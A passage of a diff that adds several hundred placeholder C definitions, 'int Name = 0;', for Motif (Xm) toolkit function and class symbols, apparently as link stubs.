+int _XmGetDragContextFromHandle = 0;
+int _XmGetDragCursorCachePtr = 0;
+int _XmGetDragProtocolStyle = 0;
+int _XmGetDragProxyWindow = 0;
+int _XmGetDragReceiverInfo = 0;
+int _XmGetDropSiteManagerObject = 0;
+int _XmGetEffectiveView = 0;
+int _XmGetEncodingRegistryTarget = 0;
+int _XmGetFirstFocus = 0;
+int _XmGetFirstFont = 0;
+int _XmGetFocus = 0;
+int _XmGetFocusData = 0;
+int _XmGetFocusFlag = 0;
+int _XmGetFocusPolicy = 0;
+int _XmGetFocusResetFlag = 0;
+int XmGetFocusWidget = 0;
+int _XmGetFontUnit = 0;
+int _XmGetHashEntryIterate = 0;
+int _XmGetHighlightColor = 0;
+int _XmGetIconControlInfo = 0;
+int XmGetIconFileName = 0;
+int _XmGetIconPixmapName = 0;
+int _XmGetImage = 0;
+int _XmGetImageAndHotSpotFromFile = 0;
+int _XmGetImageFromFile = 0;
+int _XmGetInDragMode = 0;
+int _XmGetInsensitiveStippleBitmap = 0;
+int _XmGetKidGeo = 0;
+int _XmGetLayoutDirection = 0;
+int _XmGetManagedInfo = 0;
+int _XmGetMaxCursorSize = 0;
+int _XmGetMBStringFromXmString = 0;
+int XmGetMenuCursor = 0;
+int _XmGetMenuCursorByScreen = 0;
+int _XmGetMenuProcContext = 0;
+int _XmGetMenuState = 0;
+int _XmGetMotifAtom = 0;
+int _XmGetMoveOpaqueByScreen = 0;
+int _XmGetNavigability = 0;
+int _XmGetNavigationType = 0;
+int _Xm_GetNewElement = 0;
+int XmGetNewPictureState = 0;
+int _XmGetNullCursor = 0;
+int _XmGetPixelData = 0;
+int _XmGetPixmap = 0;
+int XmGetPixmap = 0;
+int _XmGetPixmapBasedGC = 0;
+int XmGetPixmapByDepth = 0;
+int _XmGetPixmapData = 0;
+int _XmGetPointVisibility = 0;
+int _XmGetPopupMenuClick = 0;
+int XmGetPostedFromWidget = 0;
+int _XmGetRC_PopupPosted = 0;
+int _XmGetRealXlations = 0;
+int _XmGetScaledPixmap = 0;
+int XmGetScaledPixmap = 0;
+int _XmGetScreenObject = 0;
+int XmGetSecondaryResourceData = 0;
+int _XmGetTabGroup = 0;
+int XmGetTabGroup = 0;
+int XmGetTearOffControl = 0;
+int _XmGetTextualDragIcon = 0;
+int XmGetToolTipString = 0;
+int _XmGetTopShadowColor = 0;
+int _XmGetTransientFlag = 0;
+int _XmGetUnitType = 0;
+int _XmGetUnpostBehavior = 0;
+int XmGetVisibility = 0;
+int _XmGetWidgetExtData = 0;
+int _XmGetWidgetNavigPtrs = 0;
+int _XmGetWorldObject = 0;
+int _XmGetWrapperData = 0;
+int XmGetXmDisplay = 0;
+int _XmGetXmDisplayClass = 0;
+int XmGetXmScreen = 0;
+int _XmGMCalcSize = 0;
+int _XmGMDoLayout = 0;
+int _XmGMEnforceMargin = 0;
+int _XmGMHandleGeometryManager = 0;
+int _XmGMHandleQueryGeometry = 0;
+int _XmGMOverlap = 0;
+int _XmGMReplyToQueryGeometry = 0;
+int _XmGrabKeyboard = 0;
+int _XmGrabPointer = 0;
+int xmGrabShellClassRec = 0;
+int _XmGrabShell_translations = 0;
+int xmGrabShellWidgetClass = 0;
+int _XmGrabTheFocus = 0;
+int _XmHandleGeometryManager = 0;
+int _XmHandleMenuButtonPress = 0;
+int _XmHandleQueryGeometry = 0;
+int _XmHandleSizeUpdate = 0;
+int _XmHashTableCount = 0;
+int _XmHashTableSize = 0;
+int _XmHeapAlloc = 0;
+int _XmHeapCreate = 0;
+int _XmHeapFree = 0;
+int xmHierarchyClassRec = 0;
+int XmHierarchyGetChildNodes = 0;
+int XmHierarchyOpenAllAncestors = 0;
+int xmHierarchyWidgetClass = 0;
+int _XmHighlightBorder = 0;
+int _XmHighlightColorDefault = 0;
+int _XmHighlightPixmapDefault = 0;
+int _XmHWQuery = 0;
+int xmI18ListClassRec = 0;
+int XmI18ListDeselectItems = 0;
+int XmI18ListDeselectRow = 0;
+int XmI18ListDoSearch = 0;
+int XmI18ListFindRow = 0;
+int XmI18ListGetSelectedRowArray = 0;
+int XmI18ListGetSelectedRows = 0;
+int XmI18ListMakeRowVisible = 0;
+int XmI18ListSelectAllItems = 0;
+int XmI18ListSelectItems = 0;
+int XmI18ListSelectRow = 0;
+int XmI18ListToggleRow = 0;
+int xmI18ListWidgetClass = 0;
+int _XmICCCallbackToICCEvent = 0;
+int _XmICCEventToICCCallback = 0;
+int xmIconBoxClassRec = 0;
+int XmIconBoxIsCellEmpty = 0;
+int xmIconBoxWidgetClass = 0;
+int xmIconButtonClassRec = 0;
+int xmIconButtonWidgetClass = 0;
+int xmIconGadgetClass = 0;
+int xmIconGadgetClassRec = 0;
+int _XmIconGadgetIconPos = 0;
+int xmIconGCacheObjClassRec = 0;
+int xmIconHeaderClass = 0;
+int xmIconHeaderClassRec = 0;
+int _XmIEndUpdate = 0;
+int _XmImChangeManaged = 0;
+int XmImCloseXIM = 0;
+int _XmImFreeShellData = 0;
+int XmImFreeXIC = 0;
+int XmImGetXIC = 0;
+int XmImGetXICResetState = 0;
+int XmImGetXIM = 0;
+int XmImMbLookupString = 0;
+int XmImMbResetIC = 0;
+int _XmImRealize = 0;
+int _XmImRedisplay = 0;
+int XmImRegister = 0;
+int _XmImResize = 0;
+int XmImSetFocusValues = 0;
+int XmImSetValues = 0;
+int XmImSetXIC = 0;
+int XmImUnregister = 0;
+int XmImUnsetFocus = 0;
+int XmImVaSetFocusValues = 0;
+int XmImVaSetValues = 0;
+int _XmIndexToTargets = 0;
+int _XmInheritClass = 0;
+int _XmInImageCache = 0;
+int _XmInitByteOrderChar = 0;
+int _XmInitializeExtensions = 0;
+int _XmInitializeMenuCursor = 0;
+int _XmInitializeScrollBars = 0;
+int _XmInitializeSyntheticResources = 0;
+int _XmInitializeTraits = 0;
+int _XmInitModifiers = 0;
+int _XmInitTargetsTable = 0;
+int _XmInputForGadget = 0;
+int _XmInputInGadget = 0;
+int _XmInstallImage = 0;
+int XmInstallImage = 0;
+int _XmInstallPixmap = 0;
+int _XmInstallProtocols = 0;
+int XmInternAtom = 0;
+int _XmIntersectionOf = 0;
+int _XmIntersectRect = 0;
+int _XmInvalidCursorIconQuark = 0;
+int _XmIsActiveTearOff = 0;
+int _XmIsEventUnique = 0;
+int _XmIsFastSubclass = 0;
+int _XmIsISO10646 = 0;
+int XmIsMotifWMRunning = 0;
+int _XmIsNavigable = 0;
+int _XmIsScrollableClipWidget = 0;
+int _XmIsSlowSubclass = 0;
+int _XmIsStandardMotifWidgetClass = 0;
+int _XmIsSubclassOf = 0;
+int _XmIsTearOffShellDescendant = 0;
+int XmIsTraversable = 0;
+int _XmIsViewable = 0;
+int _XmJpegErrorExit = 0;
+int _XmJpegGetImage = 0;
+int _XmLabel_AccessTextualRecord = 0;
+int _XmLabelCacheCompare = 0;
+int _XmLabelCalcTextRect = 0;
+int xmLabelClassRec = 0;
+int _XmLabelCloneMenuSavvy = 0;
+int _XmLabelConvert = 0;
+int _XmLabel_defaultTranslations = 0;
+int _XmLabelGadClassExtRec = 0;
+int xmLabelGadgetClass = 0;
+int xmLabelGadgetClassRec = 0;
+int xmLabelGCacheObjClassRec = 0;
+int _XmLabelGCalcTextRect = 0;
+int _XmLabelGCloneMenuSavvy = 0;
+int _XmLabelGCVTRedraw = 0;
+int _XmLabel_menuTranslations = 0;
+int _XmLabel_menu_traversal_events = 0;
+int _XmLabelPrimClassExtRec = 0;
+int _XmLabelSetBackgroundGC = 0;
+int xmLabelWidgetClass = 0;
+int _XmLeafPaneFocusOut = 0;
+int _XmLeaveGadget = 0;
+int _XmLinkCursorIconQuark = 0;
+int _XmListAddAfter = 0;
+int _XmListAddBefore = 0;
+int XmListAddItem = 0;
+int XmListAddItems = 0;
+int XmListAddItemsUnselected = 0;
+int XmListAddItemUnselected = 0;
+int xmListClassRec = 0;
+int _XmListCount = 0;
+int XmListDeleteAllItems = 0;
+int XmListDeleteItem = 0;
+int XmListDeleteItems = 0;
+int XmListDeleteItemsPos = 0;
+int XmListDeletePos = 0;
+int XmListDeletePositions = 0;
+int XmListDeselectAllItems = 0;
+int XmListDeselectItem = 0;
+int XmListDeselectPos = 0;
+int _XmListExec = 0;
+int _XmListFree = 0;
+int XmListGetKbdItemPos = 0;
+int XmListGetMatchPos = 0;
+int XmListGetSelectedPos = 0;
+int _XmListInit = 0;
+int XmListItemExists = 0;
+int XmListItemPos = 0;
+int _XmList_ListXlations1 = 0;
+int _XmList_ListXlations2 = 0;
+int XmListPosSelected = 0;
+int XmListPosToBounds = 0;
+int _XmListRemove = 0;
+int XmListReplaceItems = 0;
+int XmListReplaceItemsPos = 0;
+int XmListReplaceItemsPosUnselected = 0;
+int XmListReplaceItemsUnselected = 0;
+int XmListReplacePositions = 0;
+int XmListSelectItem = 0;
+int XmListSelectPos = 0;
+int XmListSetAddMode = 0;
+int XmListSetBottomItem = 0;
+int XmListSetBottomPos = 0;
+int XmListSetHorizPos = 0;
+int XmListSetItem = 0;
+int XmListSetKbdItemPos = 0;
+int XmListSetPos = 0;
+int XmListUpdateSelectedList = 0;
+int xmListWidgetClass = 0;
+int XmListYToPos = 0;
+int _XmLowerCase = 0;
+int _XmLowerTearOffObscuringPoppingDownPanes = 0;
+int xmMainWindowClassRec = 0;
+int XmMainWindowSep1 = 0;
+int XmMainWindowSep2 = 0;
+int XmMainWindowSep3 = 0;
+int XmMainWindowSetAreas = 0;
+int xmMainWindowWidgetClass = 0;
+int _XmMakeGeometryRequest = 0;
+int xmManagerClassRec = 0;
+int _XmManager_defaultTranslations = 0;
+int _XmManagerEnter = 0;
+int _XmManagerFocusIn = 0;
+int _XmManagerFocusInInternal = 0;
+int _XmManagerFocusOut = 0;
+int _XmManagerGetValuesHook = 0;
+int _XmManagerHelp = 0;
+int _XmManagerHighlightPixmapDefault = 0;
+int _XmManagerImportArgs = 0;
+int _XmManagerLeave = 0;
+int _XmManager_managerTraversalTranslations = 0;
+int _XmManagerParentActivate = 0;
+int _XmManagerParentCancel = 0;
+int _XmManagerTopShadowPixmapDefault = 0;
+int _XmManagerUnmap = 0;
+int xmManagerWidgetClass = 0;
+int _XmMapBtnEvent = 0;
+int _XmMapHashTable = 0;
+int _XmMapKeyEvent = 0;
+int _XmMapKeyEvents = 0;
+int XmMapSegmentEncoding = 0;
+int _XmMatchBDragEvent = 0;
+int _XmMatchBSelectEvent = 0;
+int _XmMatchBtnEvent = 0;
+int _XmMatchKeyEvent = 0;
+int _XmMenuBarFix = 0;
+int _XmMenuBarGadgetSelect = 0;
+int _XmMenuBtnDown = 0;
+int _XmMenuBtnUp = 0;
+int _XmMenuButtonTakeFocus = 0;
+int _XmMenuButtonTakeFocusUp = 0;
+int _XmMenuCursorContext = 0;
+int _XmMenuEscape = 0;
+int _XmMenuFocus = 0;
+int _XmMenuFocusIn = 0;
+int _XmMenuFocusOut = 0;
+int _XmMenuGadgetDrag = 0;
+int _XmMenuGadgetTraverseCurrent = 0;
+int _XmMenuGadgetTraverseCurrentUp = 0;
+int _XmMenuGrabKeyboardAndPointer = 0;
+int _XmMenuHelp = 0;
+int _XmMenuPopDown = 0;
+int XmMenuPosition = 0;
+int _XmMenuSetInPMMode = 0;
+int xmMenuShellClassRec = 0;
+int _XmMenuShell_translations = 0;
+int xmMenuShellWidgetClass = 0;
+int _XmMenuTraversalHandler = 0;
+int _XmMenuTraverseDown = 0;
+int _XmMenuTraverseLeft = 0;
+int _XmMenuTraverseRight = 0;
+int _XmMenuTraverseUp = 0;
+int _XmMenuUnmap = 0;
+int xmMessageBoxClassRec = 0;
+int _XmMessageBoxGeoMatrixCreate = 0;
+int XmMessageBoxGetChild = 0;
+int _XmMessageBoxNoGeoRequest = 0;
+int xmMessageBoxWidgetClass = 0;
+int _XmMessageTypeToReason = 0;
+int _XmMgrTraversal = 0;
+int _XmMicroSleep = 0;
+int _Xm_MOTIF_DRAG_AND_DROP_MESSAGE = 0;
+int _XmMoveCursorIconQuark = 0;
+int _XmMoveObject = 0;
+int _XmMoveWidget = 0;
+int _XmMsgBaseClass_0000 = 0;
+int _XmMsgBaseClass_0001 = 0;
+int _XmMsgBulletinB_0001 = 0;
+int _XmMsgCascadeB_0000 = 0;
+int _XmMsgCascadeB_0001 = 0;
+int _XmMsgCascadeB_0002 = 0;
+int _XmMsgCascadeB_0003 = 0;
+int _XmMsgColObj_0001 = 0;
+int _XmMsgColObj_0002 = 0;
+int _XmMsgComboBox_0000 = 0;
+int _XmMsgComboBox_0001 = 0;
+int _XmMsgComboBox_0004 = 0;
+int _XmMsgComboBox_0005 = 0;
+int _XmMsgComboBox_0006 = 0;
+int _XmMsgComboBox_0007 = 0;
+int _XmMsgComboBox_0008 = 0;
+int _XmMsgComboBox_0009 = 0;
+int _XmMsgComboBox_0010 = 0;
+int _XmMsgComboBox_0011 = 0;
+int _XmMsgComboBox_0012 = 0;
+int _XmMsgComboBox_0013 = 0;
+int _XmMsgComboBox_0014 = 0;
+int _XmMsgCommand_0000 = 0;
+int _XmMsgCommand_0001 = 0;
+int _XmMsgCommand_0002 = 0;
+int _XmMsgCommand_0003 = 0;
+int _XmMsgCommand_0004 = 0;
+int _XmMsgCommand_0005 = 0;
+int _XmMsgContainer_0000 = 0;
+int _XmMsgContainer_0001 = 0;
+int _XmMsgCutPaste_0000 = 0;
+int _XmMsgCutPaste_0001 = 0;
+int _XmMsgCutPaste_0002 = 0;
+int _XmMsgCutPaste_0003 = 0;
+int _XmMsgCutPaste_0004 = 0;
+int _XmMsgCutPaste_0005 = 0;
+int _XmMsgCutPaste_0006 = 0;
+int _XmMsgCutPaste_0007 = 0;
+int _XmMsgCutPaste_0008 = 0;
+int _XmMsgCutPaste_0009 = 0;
+int _XmMsgDataF_0000 = 0;
+int _XmMsgDataF_0001 = 0;
+int _XmMsgDataF_0002 = 0;
+int _XmMsgDataF_0003 = 0;
+int _XmMsgDataF_0004 = 0;
+int _XmMsgDataF_0005 = 0;
+int _XmMsgDataF_0006 = 0;
+int _XmMsgDataFWcs_0000 = 0;
+int _XmMsgDataFWcs_0001 = 0;
+int _XmMsgDialogS_0000 = 0;
+int _XmMsgDisplay_0001 = 0;
+int _XmMsgDisplay_0002 = 0;
+int _XmMsgDisplay_0003 = 0;
+int _XmMsgDragBS_0000 = 0;
+int _XmMsgDragBS_0001 = 0;
+int _XmMsgDragBS_0002 = 0;
+int _XmMsgDragBS_0003 = 0;
+int _XmMsgDragBS_0004 = 0;
+int _XmMsgDragBS_0005 = 0;
+int _XmMsgDragBS_0006 = 0;
+int _XmMsgDragC_0001 = 0;
+int _XmMsgDragC_0002 = 0;
+int _XmMsgDragC_0003 = 0;
+int _XmMsgDragC_0004 = 0;
+int _XmMsgDragC_0005 = 0;
+int _XmMsgDragC_0006 = 0;
+int _XmMsgDragICC_0000 = 0;
+int _XmMsgDragICC_0001 = 0;
+int _XmMsgDragIcon_0000 = 0;
+int _XmMsgDragIcon_0001 = 0;
+int _XmMsgDragOverS_0000 = 0;
+int _XmMsgDragOverS_0001 = 0;
+int _XmMsgDragOverS_0002 = 0;
+int _XmMsgDragOverS_0003 = 0;
+int _XmMsgDragUnder_0000 = 0;
+int _XmMsgDragUnder_0001 = 0;
+int _XmMsgDropSMgr_0001 = 0;
+int _XmMsgDropSMgr_0002 = 0;
+int _XmMsgDropSMgr_0003 = 0;
+int _XmMsgDropSMgr_0004 = 0;
+int _XmMsgDropSMgr_0005 = 0;
+int _XmMsgDropSMgr_0006 = 0;
+int _XmMsgDropSMgr_0007 = 0;
+int _XmMsgDropSMgr_0008 = 0;
+int _XmMsgDropSMgr_0009 = 0;
+int _XmMsgDropSMgr_0010 = 0;
+int _XmMsgDropSMgrI_0001 = 0;
+int _XmMsgDropSMgrI_0002 = 0;
+int _XmMsgDropSMgrI_0003 = 0;
+int _XmMsgForm_0000 = 0;
+int _XmMsgForm_0002 = 0;
+int _XmMsgForm_0003 = 0;
+int _XmMsgGadget_0000 = 0;
+int _XmMsgLabel_0003 = 0;
+int _XmMsgLabel_0004 = 0;
+int _XmMsgList_0000 = 0;
+int _XmMsgList_0005 = 0;
+int _XmMsgList_0006 = 0;
+int _XmMsgList_0007 = 0;
+int _XmMsgList_0008 = 0;
+int _XmMsgList_0009 = 0;
+int _XmMsgList_0010 = 0;
+int _XmMsgList_0011 = 0;
+int _XmMsgList_0012 = 0;
+int _XmMsgList_0013 = 0;
+int _XmMsgList_0014 = 0;
+int _XmMsgList_0015 = 0;
+int _XmMsgMainW_0000 = 0;
+int _XmMsgMainW_0001 = 0;
+int _XmMsgManager_0000 = 0;
+int _XmMsgManager_0001 = 0;
+int _XmMsgMenuShell_0000 = 0;
+int _XmMsgMenuShell_0001 = 0;
+int _XmMsgMenuShell_0002 = 0;
+int _XmMsgMenuShell_0003 = 0;
+int _XmMsgMenuShell_0004 = 0;
+int _XmMsgMenuShell_0005 = 0;
+int _XmMsgMenuShell_0006 = 0;
+int _XmMsgMenuShell_0007 = 0;
+int _XmMsgMenuShell_0008 = 0;
+int _XmMsgMenuShell_0009 = 0;
+int _XmMsgMessageB_0003 = 0;
+int _XmMsgMessageB_0004 = 0;
+int _XmMsgMotif_0000 = 0;
+int _XmMsgMotif_0001 = 0;
+int _XmMsgNotebook_0000 = 0;
+int _XmMsgPanedW_0000 = 0;
+int _XmMsgPanedW_0001 = 0;
+int _XmMsgPanedW_0002 = 0;
+int _XmMsgPanedW_0004 = 0;
+int _XmMsgPanedW_0005 = 0;
+int _XmMsgPixConv_0000 = 0;
+int _XmMsgPrimitive_0000 = 0;
+int _XmMsgProtocols_0000 = 0;
+int _XmMsgProtocols_0001 = 0;
+int _XmMsgProtocols_0002 = 0;
+int _XmMsgRegion_0000 = 0;
+int _XmMsgRepType_0000 = 0;
+int _XmMsgRepType_0001 = 0;
+int _XmMsgRepType_0002 = 0;
+int _XmMsgResConvert_0001 = 0;
+int _XmMsgResConvert_0002 = 0;
+int _XmMsgResConvert_0003 = 0;
+int _XmMsgResConvert_0005 = 0;
+int _XmMsgResConvert_0006 = 0;
+int _XmMsgResConvert_0007 = 0;
+int _XmMsgResConvert_0008 = 0;
+int _XmMsgResConvert_0009 = 0;
+int _XmMsgResConvert_0010 = 0;
+int _XmMsgResConvert_0011 = 0;
+int _XmMsgResConvert_0012 = 0;
+int _XmMsgResConvert_0013 = 0;
+int _XmMsgResource_0001 = 0;
+int _XmMsgResource_0002 = 0;
+int _XmMsgResource_0003 = 0;
+int _XmMsgResource_0004 = 0;
+int _XmMsgResource_0005 = 0;
+int _XmMsgResource_0006 = 0;
+int _XmMsgResource_0007 = 0;
+int _XmMsgResource_0008 = 0;
+int _XmMsgResource_0009 = 0;
+int _XmMsgResource_0010 = 0;
+int _XmMsgResource_0011 = 0;
+int _XmMsgResource_0012 = 0;
+int _XmMsgResource_0013 = 0;
+int _XmMsgRowColText_0024 = 0;
+int _XmMsgRowColumn_0000 = 0;
+int _XmMsgRowColumn_0001 = 0;
+int _XmMsgRowColumn_0002 = 0;
+int _XmMsgRowColumn_0003 = 0;
+int _XmMsgRowColumn_0004 = 0;
+int _XmMsgRowColumn_0005 = 0;
+int _XmMsgRowColumn_0007 = 0;
+int _XmMsgRowColumn_0008 = 0;
+int _XmMsgRowColumn_0015 = 0;
+int _XmMsgRowColumn_0016 = 0;
+int _XmMsgRowColumn_0017 = 0;
+int _XmMsgRowColumn_0018 = 0;
+int _XmMsgRowColumn_0019 = 0;
+int _XmMsgRowColumn_0020 = 0;
+int _XmMsgRowColumn_0022 = 0;
+int _XmMsgRowColumn_0023 = 0;
+int _XmMsgRowColumn_0025 = 0;
+int _XmMsgRowColumn_0026 = 0;
+int _XmMsgRowColumn_0027 = 0;
+int _XmMsgScale_0000 = 0;
+int _XmMsgScale_0001 = 0;
+int _XmMsgScale_0002 = 0;
+int _XmMsgScale_0006 = 0;
+int _XmMsgScale_0007 = 0;
+int _XmMsgScale_0008 = 0;
+int _XmMsgScale_0009 = 0;
+int _XmMsgScaleScrBar_0004 = 0;
+int _XmMsgScreen_0000 = 0;
+int _XmMsgScreen_0001 = 0;
+int _XmMsgScrollBar_0000 = 0;
+int _XmMsgScrollBar_0001 = 0;
+int _XmMsgScrollBar_0002 = 0;
+int _XmMsgScrollBar_0003 = 0;
+int _XmMsgScrollBar_0004 = 0;
+int _XmMsgScrollBar_0005 = 0;
+int _XmMsgScrollBar_0006 = 0;
+int _XmMsgScrollBar_0007 = 0;
+int _XmMsgScrollBar_0008 = 0;
+int _XmMsgScrolledW_0004 = 0;
+int _XmMsgScrolledW_0005 = 0;
+int _XmMsgScrolledW_0006 = 0;
+int _XmMsgScrolledW_0007 = 0;
+int _XmMsgScrolledW_0008 = 0;
+int _XmMsgScrolledW_0009 = 0;
+int _XmMsgScrollFrameT_0000 = 0;
+int _XmMsgScrollFrameT_0001 = 0;
+int _XmMsgScrollVis_0000 = 0;
+int _XmMsgSelectioB_0001 = 0;
+int _XmMsgSelectioB_0002 = 0;
+int _XmMsgSpinB_0003 = 0;
+int _XmMsgSpinB_0004 = 0;
+int _XmMsgSpinB_0005 = 0;
+int _XmMsgSpinB_0006 = 0;
+int _XmMsgSpinB_0007 = 0;
+int _XmMsgSpinB_0008 = 0;
+int _XmMsgSSpinB_0001 = 0;
+int _XmMsgSSpinB_0002 = 0;
+int _XmMsgSSpinB_0003 = 0;
+int _XmMsgText_0000 = 0;
+int _XmMsgTextF_0000 = 0;
+int _XmMsgTextF_0001 = 0;
+int _XmMsgTextF_0002 = 0;
+int _XmMsgTextF_0003 = 0;
+int _XmMsgTextF_0004 = 0;
+int _XmMsgTextF_0006 = 0;
+int _XmMsgTextFWcs_0000 = 0;
+int _XmMsgTextIn_0000 = 0;
+int _XmMsgTextOut_0000 = 0;
+int _XmMsgTransfer_0000 = 0;
+int _XmMsgTransfer_0002 = 0;
+int _XmMsgTransfer_0003 = 0;
+int _XmMsgTransfer_0004 = 0;
+int _XmMsgTransfer_0005 = 0;
+int _XmMsgTransfer_0006 = 0;
+int _XmMsgTransfer_0007 = 0;
+int _XmMsgVaSimple_0000 = 0;
+int _XmMsgVaSimple_0001 = 0;
+int _XmMsgVaSimple_0002 = 0;
+int _XmMsgVendor_0000 = 0;
+int _XmMsgVendor_0001 = 0;
+int _XmMsgVendor_0002 = 0;
+int _XmMsgVendor_0003 = 0;
+int _XmMsgVisual_0000 = 0;
+int _XmMsgVisual_0001 = 0;
+int _XmMsgVisual_0002 = 0;
+int _XmMsgXmIm_0000 = 0;
+int _XmMsgXmRenderT_0000 = 0;
+int _XmMsgXmRenderT_0001 = 0;
+int _XmMsgXmRenderT_0002 = 0;
+int _XmMsgXmRenderT_0003 = 0;
+int _XmMsgXmRenderT_0004 = 0;
+int _XmMsgXmRenderT_0005 = 0;
+int _XmMsgXmString_0000 = 0;
+int _XmMsgXmTabList_0000 = 0;
+int xmMultiListClassRec = 0;
+int XmMultiListDeselectItems = 0;
+int XmMultiListDeselectRow = 0;
+int XmMultiListGetSelectedRowArray = 0;
+int XmMultiListGetSelectedRows = 0;
+int XmMultiListMakeRowVisible = 0;
+int XmMultiListSelectAllItems = 0;
+int XmMultiListSelectItems = 0;
+int XmMultiListSelectRow = 0;
+int XmMultiListToggleRow = 0;
+int XmMultiListUnselectAllItems = 0;
+int XmMultiListUnselectItem = 0;
+int xmMultiListWidgetClass = 0;
+int _XmNavigate = 0;
+int _XmNavigChangeManaged = 0;
+int _XmNavigDestroy = 0;
+int _XmNavigInitialize = 0;
+int _XmNavigResize = 0;
+int _XmNavigSetValues = 0;
+int _XmNewTravGraph = 0;
+int _XmNoneCursorIconQuark = 0;
+int xmNotebookClassRec = 0;
+int XmNotebookGetPageInfo = 0;
+int _XmNotebook_manager_translations = 0;
+int _XmNotebook_TabAccelerators = 0;
+int xmNotebookWidgetClass = 0;
+int _XmNotifyChildrenVisual = 0;
+int _XmNumDSResources = 0;
+int XmObjectAtPoint = 0;
+int _XmOffsetArrow = 0;
+int XmOptionButtonGadget = 0;
+int XmOptionLabelGadget = 0;
+int _XmOSAbsolutePathName = 0;
+int _XmOSBuildFileList = 0;
+int _XmOSBuildFileName = 0;
+int _XmOSFileCompare = 0;
+int _XmOSFindPathParts = 0;
+int _XmOSFindPatternPart = 0;
+int _XmOSGenerateMaskName = 0;
+int _XmOSGetCharDirection = 0;
+int _XmOSGetDirEntries = 0;
+int _XmOSGetHomeDirName = 0;
+int _XmOSGetInitialCharsDirection = 0;
+int _XmOSGetLocalizedString = 0;
+int XmOSGetMethod = 0;
+int _XmOSInitPath = 0;
+int _XmOSKeySymToCharacter = 0;
+int _XmOSPutenv = 0;
+int _XmOSQualifyFileSpec = 0;
+int xmOutlineClassRec = 0;
+int xmOutlineWidgetClass = 0;
+int XMoveResizeWindow = 0;
+int XMoveWindow = 0;
+int xmPanedClassRec = 0;
+int XmPanedGetPanes = 0;
+int xmPanedWidgetClass = 0;
+int xmPanedWindowClassRec = 0;
+int xmPanedWindowWidgetClass = 0;
+int _XmParentProcess = 0;
+int XmParseMappingCreate = 0;
+int XmParseMappingFree = 0;
+int XmParseMappingGetValues = 0;
+int XmParseMappingSetValues = 0;
+int XmParsePicture = 0;
+int XmParseTableFree = 0;
+int _XmPathIsTraversable = 0;
+int XmPictureDelete = 0;
+int XmPictureDeleteState = 0;
+int XmPictureDoAutoFill = 0;
+int XmPictureGetCurrentString = 0;
+int XmPictureProcessCharacter = 0;
+int _XmPngGetImage = 0;
+int _XmPopdown = 0;
+int _XmPopup = 0;
+int _XmPopupSpringLoaded = 0;
+int _XmPopWidgetExtData = 0;
+int _XmPostPopupMenu = 0;
+int _XmPrimbaseClassExtRec = 0;
+int _XmPrimClassExtRec = 0;
+int xmPrimitiveClassRec = 0;
+int _XmPrimitive_defaultTranslations = 0;
+int _XmPrimitiveEnter = 0;
+int _XmPrimitiveFocusIn = 0;
+int _XmPrimitiveFocusInInternal = 0;
+int _XmPrimitiveFocusOut = 0;
+int _XmPrimitiveGetValuesHook = 0;
+int _XmPrimitiveHelp = 0;
+int _XmPrimitiveHighlightPixmapDefault = 0;
+int _XmPrimitiveImportArgs = 0;
+int _XmPrimitiveLeave = 0;
+int _XmPrimitiveParentActivate = 0;
+int _XmPrimitiveParentCancel = 0;
+int _XmPrimitiveTopShadowPixmapDefault = 0;
+int _XmPrimitiveUnmap = 0;
+int xmPrimitiveWidgetClass = 0;
+int _XmProcessDrag = 0;
+int _XmProcessTraversal = 0;
+int XmProcessTraversal = 0;
+int xmProtocolClassRec = 0;
+int xmProtocolObjectClass = 0;
+int _XmPushB_defaultTranslations = 0;
+int _XmPushBGadClassExtRec = 0;
+int _XmPushB_menuTranslations = 0;
+int _XmPushBPrimClassExtRec = 0;
+int xmPushButtonClassRec = 0;
+int xmPushButtonGadgetClass = 0;
+int xmPushButtonGadgetClassRec = 0;
+int xmPushButtonGCacheObjClassRec = 0;
+int xmPushButtonWidgetClass = 0;
+int _XmPushWidgetExtData = 0;
+int _XmPutScaledImage = 0;
+int XmQmotif = 0;
+int XmQTaccessColors = 0;
+int XmQTaccessTextual = 0;
+int XmQTactivatable = 0;
+int XmQTcareParentVisual = 0;
+int _XmQTclipWindow = 0;
+int XmQTcontainer = 0;
+int XmQTcontainerItem = 0;
+int XmQTdialogShellSavvy = 0;
+int XmQTjoinSide = 0;
+int XmQTmenuSavvy = 0;
+int XmQTmenuSystem = 0;
+int XmQTmotifTrait = 0;
+int XmQTnavigator = 0;
+int XmQTpointIn = 0;
+int XmQTscrollFrame = 0;
+int XmQTspecifyLayoutDirection = 0;
+int XmQTspecifyRenderTable = 0;
+int XmQTspecifyUnhighlight = 0;
+int XmQTspecifyUnitType = 0;
+int XmQTtakesDefault = 0;
+int XmQTtoolTip = 0;
+int XmQTtoolTipConfig = 0;
+int XmQTtransfer = 0;
+int XmQTtraversalControl = 0;
+int _XmQualifyLabelLocalCache = 0;
+int _XmQueryPixmapCache = 0;
+int _XmQueueCount = 0;
+int _XmQueueFree = 0;
+int _XmQueueInit = 0;
+int _XmQueuePop = 0;
+int _XmRCAdaptToSize = 0;
+int _XmRC_AddPopupEventHandlers = 0;
+int _XmRC_AddToPostFromList = 0;
+int _XmRCArmAndActivate = 0;
+int _XmRC_CheckAndSetOptionCascade = 0;
+int _XmRCColorHook = 0;
+int _XmRCDoMarginAdjustment = 0;
+int _XmRC_DoProcessMenuTree = 0;
+int _XmRC_GadgetTraverseDown = 0;
+int _XmRC_GadgetTraverseLeft = 0;
+int _XmRC_GadgetTraverseRight = 0;
+int _XmRC_GadgetTraverseUp = 0;
+int _XmRCGetKidGeo = 0;
+int _XmRC_GetLabelString = 0;
+int _XmRC_GetMenuAccelerator = 0;
+int _XmRC_GetMnemonicCharSet = 0;
+int _XmRCGetTopManager = 0;
+int _XmRC_KeyboardInputHandler = 0;
+int _XmRCMenuProcedureEntry = 0;
+int _XmRC_menuSystemRecord = 0;
+int _XmRC_PostTimeOut = 0;
+int _XmRCPreferredSize = 0;
+int _XmRC_ProcessSingleWidget = 0;
+int _XmRC_RemoveFromPostFromList = 0;
+int _XmRC_RemoveFromPostFromListOnDestroyCB = 0;
+int _XmRC_RemoveHandlersFromPostFromWidget = 0;
+int _XmRC_RemovePopupEventHandlers = 0;
+int _XmRCSetKidGeo = 0;
+int _XmRC_SetMenuHistory = 0;
+int _XmRC_SetOptionMenuHistory = 0;
+int _XmRC_SetOrGetTextMargins = 0;
+int _XmRCThinkAboutSize = 0;
+int _XmRC_UpdateOptionMenuCBG = 0;
+int _XmReadDragBuffer = 0;
+int _XmReadDSFromStream = 0;
+int _XmReadImageAndHotSpotFromFile = 0;
+int _XmReadInitiatorInfo = 0;
+int _XmReasonToMessageType = 0;
